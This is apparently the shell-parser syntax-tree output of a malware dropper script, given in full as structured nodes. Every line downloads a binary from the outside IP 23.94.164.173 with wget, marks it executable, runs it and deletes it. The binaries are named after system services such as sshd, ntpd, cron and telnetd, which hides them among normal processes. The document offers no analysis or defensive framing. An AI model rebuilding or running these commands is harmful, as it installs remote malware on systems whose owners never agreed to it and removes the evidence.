ListNode(lineno=2, pos=(12, 133), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 97), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 97), word='http://23.94.164.173/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(97, 98)),
  CommandNode(lineno=2, pos=(99, 112), parts=[
    WordNode(lineno=2, pos=(99, 104), word='chmod'),
    WordNode(lineno=2, pos=(105, 107), word='+x'),
    WordNode(lineno=2, pos=(108, 112), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(112, 113)),
  CommandNode(lineno=2, pos=(114, 120), parts=[
    WordNode(lineno=2, pos=(114, 120), word='./ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(120, 121)),
  CommandNode(lineno=2, pos=(122, 133), parts=[
    WordNode(lineno=2, pos=(122, 124), word='rm'),
    WordNode(lineno=2, pos=(125, 128), word='-rf'),
    WordNode(lineno=2, pos=(129, 133), word='ntpd'),
  ]),
])
ListNode(lineno=3, pos=(134, 255), parts=[
  CommandNode(lineno=3, pos=(134, 141), parts=[
    WordNode(lineno=3, pos=(134, 136), word='cd'),
    WordNode(lineno=3, pos=(137, 141), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(142, 144)),
  CommandNode(lineno=3, pos=(145, 156), parts=[
    WordNode(lineno=3, pos=(145, 147), word='cd'),
    WordNode(lineno=3, pos=(148, 156), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(157, 159)),
  CommandNode(lineno=3, pos=(160, 167), parts=[
    WordNode(lineno=3, pos=(160, 162), word='cd'),
    WordNode(lineno=3, pos=(163, 167), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(168, 170)),
  CommandNode(lineno=3, pos=(171, 179), parts=[
    WordNode(lineno=3, pos=(171, 173), word='cd'),
    WordNode(lineno=3, pos=(174, 179), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(180, 182)),
  CommandNode(lineno=3, pos=(183, 187), parts=[
    WordNode(lineno=3, pos=(183, 185), word='cd'),
    WordNode(lineno=3, pos=(186, 187), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(187, 188)),
  CommandNode(lineno=3, pos=(189, 219), parts=[
    WordNode(lineno=3, pos=(189, 193), word='wget'),
    WordNode(lineno=3, pos=(194, 219), word='http://23.94.164.173/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(219, 220)),
  CommandNode(lineno=3, pos=(221, 234), parts=[
    WordNode(lineno=3, pos=(221, 226), word='chmod'),
    WordNode(lineno=3, pos=(227, 229), word='+x'),
    WordNode(lineno=3, pos=(230, 234), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(234, 235)),
  CommandNode(lineno=3, pos=(236, 242), parts=[
    WordNode(lineno=3, pos=(236, 242), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(242, 243)),
  CommandNode(lineno=3, pos=(244, 255), parts=[
    WordNode(lineno=3, pos=(244, 246), word='rm'),
    WordNode(lineno=3, pos=(247, 250), word='-rf'),
    WordNode(lineno=3, pos=(251, 255), word='sshd'),
  ]),
])
ListNode(lineno=4, pos=(256, 389), parts=[
  CommandNode(lineno=4, pos=(256, 263), parts=[
    WordNode(lineno=4, pos=(256, 258), word='cd'),
    WordNode(lineno=4, pos=(259, 263), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(264, 266)),
  CommandNode(lineno=4, pos=(267, 278), parts=[
    WordNode(lineno=4, pos=(267, 269), word='cd'),
    WordNode(lineno=4, pos=(270, 278), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(279, 281)),
  CommandNode(lineno=4, pos=(282, 289), parts=[
    WordNode(lineno=4, pos=(282, 284), word='cd'),
    WordNode(lineno=4, pos=(285, 289), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(290, 292)),
  CommandNode(lineno=4, pos=(293, 301), parts=[
    WordNode(lineno=4, pos=(293, 295), word='cd'),
    WordNode(lineno=4, pos=(296, 301), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(302, 304)),
  CommandNode(lineno=4, pos=(305, 309), parts=[
    WordNode(lineno=4, pos=(305, 307), word='cd'),
    WordNode(lineno=4, pos=(308, 309), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(309, 310)),
  CommandNode(lineno=4, pos=(311, 344), parts=[
    WordNode(lineno=4, pos=(311, 315), word='wget'),
    WordNode(lineno=4, pos=(316, 344), word='http://23.94.164.173/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(344, 345)),
  CommandNode(lineno=4, pos=(346, 362), parts=[
    WordNode(lineno=4, pos=(346, 351), word='chmod'),
    WordNode(lineno=4, pos=(352, 354), word='+x'),
    WordNode(lineno=4, pos=(355, 362), word='openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(362, 363)),
  CommandNode(lineno=4, pos=(364, 373), parts=[
    WordNode(lineno=4, pos=(364, 373), word='./openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(373, 374)),
  CommandNode(lineno=4, pos=(375, 389), parts=[
    WordNode(lineno=4, pos=(375, 377), word='rm'),
    WordNode(lineno=4, pos=(378, 381), word='-rf'),
    WordNode(lineno=4, pos=(382, 389), word='openssh'),
  ]),
])
ListNode(lineno=5, pos=(390, 511), parts=[
  CommandNode(lineno=5, pos=(390, 397), parts=[
    WordNode(lineno=5, pos=(390, 392), word='cd'),
    WordNode(lineno=5, pos=(393, 397), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(398, 400)),
  CommandNode(lineno=5, pos=(401, 412), parts=[
    WordNode(lineno=5, pos=(401, 403), word='cd'),
    WordNode(lineno=5, pos=(404, 412), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(413, 415)),
  CommandNode(lineno=5, pos=(416, 423), parts=[
    WordNode(lineno=5, pos=(416, 418), word='cd'),
    WordNode(lineno=5, pos=(419, 423), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(424, 426)),
  CommandNode(lineno=5, pos=(427, 435), parts=[
    WordNode(lineno=5, pos=(427, 429), word='cd'),
    WordNode(lineno=5, pos=(430, 435), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(436, 438)),
  CommandNode(lineno=5, pos=(439, 443), parts=[
    WordNode(lineno=5, pos=(439, 441), word='cd'),
    WordNode(lineno=5, pos=(442, 443), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(443, 444)),
  CommandNode(lineno=5, pos=(445, 475), parts=[
    WordNode(lineno=5, pos=(445, 449), word='wget'),
    WordNode(lineno=5, pos=(450, 475), word='http://23.94.164.173/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(475, 476)),
  CommandNode(lineno=5, pos=(477, 490), parts=[
    WordNode(lineno=5, pos=(477, 482), word='chmod'),
    WordNode(lineno=5, pos=(483, 485), word='+x'),
    WordNode(lineno=5, pos=(486, 490), word='bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(490, 491)),
  CommandNode(lineno=5, pos=(492, 498), parts=[
    WordNode(lineno=5, pos=(492, 498), word='./bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(498, 499)),
  CommandNode(lineno=5, pos=(500, 511), parts=[
    WordNode(lineno=5, pos=(500, 502), word='rm'),
    WordNode(lineno=5, pos=(503, 506), word='-rf'),
    WordNode(lineno=5, pos=(507, 511), word='bash'),
  ]),
])
ListNode(lineno=6, pos=(512, 633), parts=[
  CommandNode(lineno=6, pos=(512, 519), parts=[
    WordNode(lineno=6, pos=(512, 514), word='cd'),
    WordNode(lineno=6, pos=(515, 519), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(520, 522)),
  CommandNode(lineno=6, pos=(523, 534), parts=[
    WordNode(lineno=6, pos=(523, 525), word='cd'),
    WordNode(lineno=6, pos=(526, 534), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(535, 537)),
  CommandNode(lineno=6, pos=(538, 545), parts=[
    WordNode(lineno=6, pos=(538, 540), word='cd'),
    WordNode(lineno=6, pos=(541, 545), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(546, 548)),
  CommandNode(lineno=6, pos=(549, 557), parts=[
    WordNode(lineno=6, pos=(549, 551), word='cd'),
    WordNode(lineno=6, pos=(552, 557), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(558, 560)),
  CommandNode(lineno=6, pos=(561, 565), parts=[
    WordNode(lineno=6, pos=(561, 563), word='cd'),
    WordNode(lineno=6, pos=(564, 565), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(565, 566)),
  CommandNode(lineno=6, pos=(567, 597), parts=[
    WordNode(lineno=6, pos=(567, 571), word='wget'),
    WordNode(lineno=6, pos=(572, 597), word='http://23.94.164.173/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(597, 598)),
  CommandNode(lineno=6, pos=(599, 612), parts=[
    WordNode(lineno=6, pos=(599, 604), word='chmod'),
    WordNode(lineno=6, pos=(605, 607), word='+x'),
    WordNode(lineno=6, pos=(608, 612), word='tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(612, 613)),
  CommandNode(lineno=6, pos=(614, 620), parts=[
    WordNode(lineno=6, pos=(614, 620), word='./tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(620, 621)),
  CommandNode(lineno=6, pos=(622, 633), parts=[
    WordNode(lineno=6, pos=(622, 624), word='rm'),
    WordNode(lineno=6, pos=(625, 628), word='-rf'),
    WordNode(lineno=6, pos=(629, 633), word='tftp'),
  ]),
])
ListNode(lineno=7, pos=(634, 755), parts=[
  CommandNode(lineno=7, pos=(634, 641), parts=[
    WordNode(lineno=7, pos=(634, 636), word='cd'),
    WordNode(lineno=7, pos=(637, 641), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(642, 644)),
  CommandNode(lineno=7, pos=(645, 656), parts=[
    WordNode(lineno=7, pos=(645, 647), word='cd'),
    WordNode(lineno=7, pos=(648, 656), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(657, 659)),
  CommandNode(lineno=7, pos=(660, 667), parts=[
    WordNode(lineno=7, pos=(660, 662), word='cd'),
    WordNode(lineno=7, pos=(663, 667), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(668, 670)),
  CommandNode(lineno=7, pos=(671, 679), parts=[
    WordNode(lineno=7, pos=(671, 673), word='cd'),
    WordNode(lineno=7, pos=(674, 679), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(680, 682)),
  CommandNode(lineno=7, pos=(683, 687), parts=[
    WordNode(lineno=7, pos=(683, 685), word='cd'),
    WordNode(lineno=7, pos=(686, 687), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(687, 688)),
  CommandNode(lineno=7, pos=(689, 719), parts=[
    WordNode(lineno=7, pos=(689, 693), word='wget'),
    WordNode(lineno=7, pos=(694, 719), word='http://23.94.164.173/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(719, 720)),
  CommandNode(lineno=7, pos=(721, 734), parts=[
    WordNode(lineno=7, pos=(721, 726), word='chmod'),
    WordNode(lineno=7, pos=(727, 729), word='+x'),
    WordNode(lineno=7, pos=(730, 734), word='wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(734, 735)),
  CommandNode(lineno=7, pos=(736, 742), parts=[
    WordNode(lineno=7, pos=(736, 742), word='./wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(742, 743)),
  CommandNode(lineno=7, pos=(744, 755), parts=[
    WordNode(lineno=7, pos=(744, 746), word='rm'),
    WordNode(lineno=7, pos=(747, 750), word='-rf'),
    WordNode(lineno=7, pos=(751, 755), word='wget'),
  ]),
])
ListNode(lineno=8, pos=(756, 877), parts=[
  CommandNode(lineno=8, pos=(756, 763), parts=[
    WordNode(lineno=8, pos=(756, 758), word='cd'),
    WordNode(lineno=8, pos=(759, 763), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(764, 766)),
  CommandNode(lineno=8, pos=(767, 778), parts=[
    WordNode(lineno=8, pos=(767, 769), word='cd'),
    WordNode(lineno=8, pos=(770, 778), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(779, 781)),
  CommandNode(lineno=8, pos=(782, 789), parts=[
    WordNode(lineno=8, pos=(782, 784), word='cd'),
    WordNode(lineno=8, pos=(785, 789), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(790, 792)),
  CommandNode(lineno=8, pos=(793, 801), parts=[
    WordNode(lineno=8, pos=(793, 795), word='cd'),
    WordNode(lineno=8, pos=(796, 801), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(802, 804)),
  CommandNode(lineno=8, pos=(805, 809), parts=[
    WordNode(lineno=8, pos=(805, 807), word='cd'),
    WordNode(lineno=8, pos=(808, 809), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(809, 810)),
  CommandNode(lineno=8, pos=(811, 841), parts=[
    WordNode(lineno=8, pos=(811, 815), word='wget'),
    WordNode(lineno=8, pos=(816, 841), word='http://23.94.164.173/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(841, 842)),
  CommandNode(lineno=8, pos=(843, 856), parts=[
    WordNode(lineno=8, pos=(843, 848), word='chmod'),
    WordNode(lineno=8, pos=(849, 851), word='+x'),
    WordNode(lineno=8, pos=(852, 856), word='cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(856, 857)),
  CommandNode(lineno=8, pos=(858, 864), parts=[
    WordNode(lineno=8, pos=(858, 864), word='./cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(864, 865)),
  CommandNode(lineno=8, pos=(866, 877), parts=[
    WordNode(lineno=8, pos=(866, 868), word='rm'),
    WordNode(lineno=8, pos=(869, 872), word='-rf'),
    WordNode(lineno=8, pos=(873, 877), word='cron'),
  ]),
])
ListNode(lineno=9, pos=(878, 995), parts=[
  CommandNode(lineno=9, pos=(878, 885), parts=[
    WordNode(lineno=9, pos=(878, 880), word='cd'),
    WordNode(lineno=9, pos=(881, 885), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(886, 888)),
  CommandNode(lineno=9, pos=(889, 900), parts=[
    WordNode(lineno=9, pos=(889, 891), word='cd'),
    WordNode(lineno=9, pos=(892, 900), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(901, 903)),
  CommandNode(lineno=9, pos=(904, 911), parts=[
    WordNode(lineno=9, pos=(904, 906), word='cd'),
    WordNode(lineno=9, pos=(907, 911), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(912, 914)),
  CommandNode(lineno=9, pos=(915, 923), parts=[
    WordNode(lineno=9, pos=(915, 917), word='cd'),
    WordNode(lineno=9, pos=(918, 923), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(924, 926)),
  CommandNode(lineno=9, pos=(927, 931), parts=[
    WordNode(lineno=9, pos=(927, 929), word='cd'),
    WordNode(lineno=9, pos=(930, 931), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(931, 932)),
  CommandNode(lineno=9, pos=(933, 962), parts=[
    WordNode(lineno=9, pos=(933, 937), word='wget'),
    WordNode(lineno=9, pos=(938, 962), word='http://23.94.164.173/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(962, 963)),
  CommandNode(lineno=9, pos=(964, 976), parts=[
    WordNode(lineno=9, pos=(964, 969), word='chmod'),
    WordNode(lineno=9, pos=(970, 972), word='+x'),
    WordNode(lineno=9, pos=(973, 976), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(976, 977)),
  CommandNode(lineno=9, pos=(978, 983), parts=[
    WordNode(lineno=9, pos=(978, 983), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(983, 984)),
  CommandNode(lineno=9, pos=(985, 995), parts=[
    WordNode(lineno=9, pos=(985, 987), word='rm'),
    WordNode(lineno=9, pos=(988, 991), word='-rf'),
    WordNode(lineno=9, pos=(992, 995), word='ftp'),
  ]),
])
ListNode(lineno=10, pos=(996, 1117), parts=[
  CommandNode(lineno=10, pos=(996, 1003), parts=[
    WordNode(lineno=10, pos=(996, 998), word='cd'),
    WordNode(lineno=10, pos=(999, 1003), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1004, 1006)),
  CommandNode(lineno=10, pos=(1007, 1018), parts=[
    WordNode(lineno=10, pos=(1007, 1009), word='cd'),
    WordNode(lineno=10, pos=(1010, 1018), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1019, 1021)),
  CommandNode(lineno=10, pos=(1022, 1029), parts=[
    WordNode(lineno=10, pos=(1022, 1024), word='cd'),
    WordNode(lineno=10, pos=(1025, 1029), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1030, 1032)),
  CommandNode(lineno=10, pos=(1033, 1041), parts=[
    WordNode(lineno=10, pos=(1033, 1035), word='cd'),
    WordNode(lineno=10, pos=(1036, 1041), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1042, 1044)),
  CommandNode(lineno=10, pos=(1045, 1049), parts=[
    WordNode(lineno=10, pos=(1045, 1047), word='cd'),
    WordNode(lineno=10, pos=(1048, 1049), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1049, 1050)),
  CommandNode(lineno=10, pos=(1051, 1081), parts=[
    WordNode(lineno=10, pos=(1051, 1055), word='wget'),
    WordNode(lineno=10, pos=(1056, 1081), word='http://23.94.164.173/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1081, 1082)),
  CommandNode(lineno=10, pos=(1083, 1096), parts=[
    WordNode(lineno=10, pos=(1083, 1088), word='chmod'),
    WordNode(lineno=10, pos=(1089, 1091), word='+x'),
    WordNode(lineno=10, pos=(1092, 1096), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1096, 1097)),
  CommandNode(lineno=10, pos=(1098, 1104), parts=[
    WordNode(lineno=10, pos=(1098, 1104), word='./pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1104, 1105)),
  CommandNode(lineno=10, pos=(1106, 1117), parts=[
    WordNode(lineno=10, pos=(1106, 1108), word='rm'),
    WordNode(lineno=10, pos=(1109, 1112), word='-rf'),
    WordNode(lineno=10, pos=(1113, 1117), word='pftp'),
  ]),
])
ListNode(lineno=11, pos=(1118, 1231), parts=[
  CommandNode(lineno=11, pos=(1118, 1125), parts=[
    WordNode(lineno=11, pos=(1118, 1120), word='cd'),
    WordNode(lineno=11, pos=(1121, 1125), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1126, 1128)),
  CommandNode(lineno=11, pos=(1129, 1140), parts=[
    WordNode(lineno=11, pos=(1129, 1131), word='cd'),
    WordNode(lineno=11, pos=(1132, 1140), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1141, 1143)),
  CommandNode(lineno=11, pos=(1144, 1151), parts=[
    WordNode(lineno=11, pos=(1144, 1146), word='cd'),
    WordNode(lineno=11, pos=(1147, 1151), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1152, 1154)),
  CommandNode(lineno=11, pos=(1155, 1163), parts=[
    WordNode(lineno=11, pos=(1155, 1157), word='cd'),
    WordNode(lineno=11, pos=(1158, 1163), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1164, 1166)),
  CommandNode(lineno=11, pos=(1167, 1171), parts=[
    WordNode(lineno=11, pos=(1167, 1169), word='cd'),
    WordNode(lineno=11, pos=(1170, 1171), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1171, 1172)),
  CommandNode(lineno=11, pos=(1173, 1201), parts=[
    WordNode(lineno=11, pos=(1173, 1177), word='wget'),
    WordNode(lineno=11, pos=(1178, 1201), word='http://23.94.164.173/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1201, 1202)),
  CommandNode(lineno=11, pos=(1203, 1214), parts=[
    WordNode(lineno=11, pos=(1203, 1208), word='chmod'),
    WordNode(lineno=11, pos=(1209, 1211), word='+x'),
    WordNode(lineno=11, pos=(1212, 1214), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1214, 1215)),
  CommandNode(lineno=11, pos=(1216, 1220), parts=[
    WordNode(lineno=11, pos=(1216, 1220), word='./sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1220, 1221)),
  CommandNode(lineno=11, pos=(1222, 1231), parts=[
    WordNode(lineno=11, pos=(1222, 1224), word='rm'),
    WordNode(lineno=11, pos=(1225, 1228), word='-rf'),
    WordNode(lineno=11, pos=(1229, 1231), word='sh'),
  ]),
])
ListNode(lineno=12, pos=(1232, 1357), parts=[
  CommandNode(lineno=12, pos=(1232, 1239), parts=[
    WordNode(lineno=12, pos=(1232, 1234), word='cd'),
    WordNode(lineno=12, pos=(1235, 1239), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1240, 1242)),
  CommandNode(lineno=12, pos=(1243, 1254), parts=[
    WordNode(lineno=12, pos=(1243, 1245), word='cd'),
    WordNode(lineno=12, pos=(1246, 1254), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1255, 1257)),
  CommandNode(lineno=12, pos=(1258, 1265), parts=[
    WordNode(lineno=12, pos=(1258, 1260), word='cd'),
    WordNode(lineno=12, pos=(1261, 1265), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1266, 1268)),
  CommandNode(lineno=12, pos=(1269, 1277), parts=[
    WordNode(lineno=12, pos=(1269, 1271), word='cd'),
    WordNode(lineno=12, pos=(1272, 1277), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1278, 1280)),
  CommandNode(lineno=12, pos=(1281, 1285), parts=[
    WordNode(lineno=12, pos=(1281, 1283), word='cd'),
    WordNode(lineno=12, pos=(1284, 1285), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1285, 1286)),
  CommandNode(lineno=12, pos=(1287, 1318), parts=[
    WordNode(lineno=12, pos=(1287, 1291), word='wget'),
    WordNode(lineno=12, pos=(1292, 1318), word='http://23.94.164.173/[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1318, 1319)),
  CommandNode(lineno=12, pos=(1320, 1334), parts=[
    WordNode(lineno=12, pos=(1320, 1325), word='chmod'),
    WordNode(lineno=12, pos=(1326, 1328), word='+x'),
    WordNode(lineno=12, pos=(1329, 1334), word='[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1334, 1335)),
  CommandNode(lineno=12, pos=(1336, 1343), parts=[
    WordNode(lineno=12, pos=(1336, 1343), word='./[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1343, 1344)),
  CommandNode(lineno=12, pos=(1345, 1357), parts=[
    WordNode(lineno=12, pos=(1345, 1347), word='rm'),
    WordNode(lineno=12, pos=(1348, 1351), word='-rf'),
    WordNode(lineno=12, pos=(1352, 1357), word='[cpu]'),
  ]),
])
ListNode(lineno=13, pos=(1358, 1491), parts=[
  CommandNode(lineno=13, pos=(1358, 1365), parts=[
    WordNode(lineno=13, pos=(1358, 1360), word='cd'),
    WordNode(lineno=13, pos=(1361, 1365), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1366, 1368)),
  CommandNode(lineno=13, pos=(1369, 1380), parts=[
    WordNode(lineno=13, pos=(1369, 1371), word='cd'),
    WordNode(lineno=13, pos=(1372, 1380), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1381, 1383)),
  CommandNode(lineno=13, pos=(1384, 1391), parts=[
    WordNode(lineno=13, pos=(1384, 1386), word='cd'),
    WordNode(lineno=13, pos=(1387, 1391), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1392, 1394)),
  CommandNode(lineno=13, pos=(1395, 1403), parts=[
    WordNode(lineno=13, pos=(1395, 1397), word='cd'),
    WordNode(lineno=13, pos=(1398, 1403), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1404, 1406)),
  CommandNode(lineno=13, pos=(1407, 1411), parts=[
    WordNode(lineno=13, pos=(1407, 1409), word='cd'),
    WordNode(lineno=13, pos=(1410, 1411), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1411, 1412)),
  CommandNode(lineno=13, pos=(1413, 1446), parts=[
    WordNode(lineno=13, pos=(1413, 1417), word='wget'),
    WordNode(lineno=13, pos=(1418, 1446), word='http://23.94.164.173/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1446, 1447)),
  CommandNode(lineno=13, pos=(1448, 1464), parts=[
    WordNode(lineno=13, pos=(1448, 1453), word='chmod'),
    WordNode(lineno=13, pos=(1454, 1456), word='+x'),
    WordNode(lineno=13, pos=(1457, 1464), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1464, 1465)),
  CommandNode(lineno=13, pos=(1466, 1475), parts=[
    WordNode(lineno=13, pos=(1466, 1475), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1475, 1476)),
  CommandNode(lineno=13, pos=(1477, 1491), parts=[
    WordNode(lineno=13, pos=(1477, 1479), word='rm'),
    WordNode(lineno=13, pos=(1480, 1483), word='-rf'),
    WordNode(lineno=13, pos=(1484, 1491), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1492, 1625), parts=[
  CommandNode(lineno=14, pos=(1492, 1499), parts=[
    WordNode(lineno=14, pos=(1492, 1494), word='cd'),
    WordNode(lineno=14, pos=(1495, 1499), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1500, 1502)),
  CommandNode(lineno=14, pos=(1503, 1514), parts=[
    WordNode(lineno=14, pos=(1503, 1505), word='cd'),
    WordNode(lineno=14, pos=(1506, 1514), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1515, 1517)),
  CommandNode(lineno=14, pos=(1518, 1525), parts=[
    WordNode(lineno=14, pos=(1518, 1520), word='cd'),
    WordNode(lineno=14, pos=(1521, 1525), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1526, 1528)),
  CommandNode(lineno=14, pos=(1529, 1537), parts=[
    WordNode(lineno=14, pos=(1529, 1531), word='cd'),
    WordNode(lineno=14, pos=(1532, 1537), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1538, 1540)),
  CommandNode(lineno=14, pos=(1541, 1545), parts=[
    WordNode(lineno=14, pos=(1541, 1543), word='cd'),
    WordNode(lineno=14, pos=(1544, 1545), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1545, 1546)),
  CommandNode(lineno=14, pos=(1547, 1580), parts=[
    WordNode(lineno=14, pos=(1547, 1551), word='wget'),
    WordNode(lineno=14, pos=(1552, 1580), word='http://23.94.164.173/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1580, 1581)),
  CommandNode(lineno=14, pos=(1582, 1598), parts=[
    WordNode(lineno=14, pos=(1582, 1587), word='chmod'),
    WordNode(lineno=14, pos=(1588, 1590), word='+x'),
    WordNode(lineno=14, pos=(1591, 1598), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1598, 1599)),
  CommandNode(lineno=14, pos=(1600, 1609), parts=[
    WordNode(lineno=14, pos=(1600, 1609), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1609, 1610)),
  CommandNode(lineno=14, pos=(1611, 1625), parts=[
    WordNode(lineno=14, pos=(1611, 1613), word='rm'),
    WordNode(lineno=14, pos=(1614, 1617), word='-rf'),
    WordNode(lineno=14, pos=(1618, 1625), word='telnetd'),
  ]),
])
